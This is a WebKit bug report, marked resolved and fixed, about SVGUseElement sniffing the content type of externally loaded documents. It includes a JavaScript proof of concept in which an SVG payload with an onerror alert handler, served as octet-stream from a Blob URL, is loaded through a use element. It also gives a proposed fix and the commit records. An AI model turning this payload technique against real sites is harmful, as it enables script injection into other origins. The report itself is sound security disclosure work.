RESOLVED FIXED 249948
SVGUseElement sniffs content type when loading external document 
https://bugs.webkit.org/show_bug.cgi?id=249948
Summary SVGUseElement sniffs content type when loading external document
Jun Kokatsu
Reported 2022-12-29 14:38:35 PST
PoC: ``` const text = `<svg id="x" xmlns="http://www.w3.org/2000/svg"><image href="xyz" onerror="alert(origin)" /></svg>`; const blob = new Blob([text], {type: 'application/octet-stream'}); // <- not "image/svg+xml" const url = URL.createObjectURL(blob); let attackerControlledString = url + "#x"; const svg=document.createElementNS("http://www.w3.org/2000/svg", "svg"); const use=document.createElementNS("http://www.w3.org/2000/svg", "use"); use.setAttribute('href', attackerControlledString); svg.appendChild(use); document.body.appendChild(svg); ``` The above code only loads external SVG from a Blob URL in Webkit. Both Blink and Gecko ignores it due to content type mismatch. Potential fix is to add the following code after https://github.com/WebKit/WebKit/blob/5c3443a0ab7a7fdeaeeb20c104da59b55de0e265/Source/WebCore/svg/SVGUseElement.cpp#L614. ``` options.sniffContent = ContentSniffingPolicy::DoNotSniffContent; ```
Attachments
Add attachment proposed patch, testcase, etc.
Radar WebKit Bug Importer
Comment 1 2023-01-04 16:35:34 PST
<rdar://problem/103893082>
zak ridouh
Comment 2 2024-08-22 16:02:59 PDT
Pull request: https://github.com/WebKit/WebKit/pull/32612
EWS
Comment 3 2024-09-10 17:14:30 PDT
Committed 283447@main (6ba5b52ad5c1): <https://commits.webkit.org/283447@main> Reviewed commits have been landed. Closing PR #32612 and removing active labels.
EWS
Comment 4 2024-09-12 20:04:47 PDT
Committed 283286.25@safari-7620-branch (a22ef8e7a842): <https://commits.webkit.org/283286.25@safari-7620-branch> Reviewed commits have been landed. Closing PR #1753 and removing active labels.
Note You need to log in before you can comment on or make changes to this bug.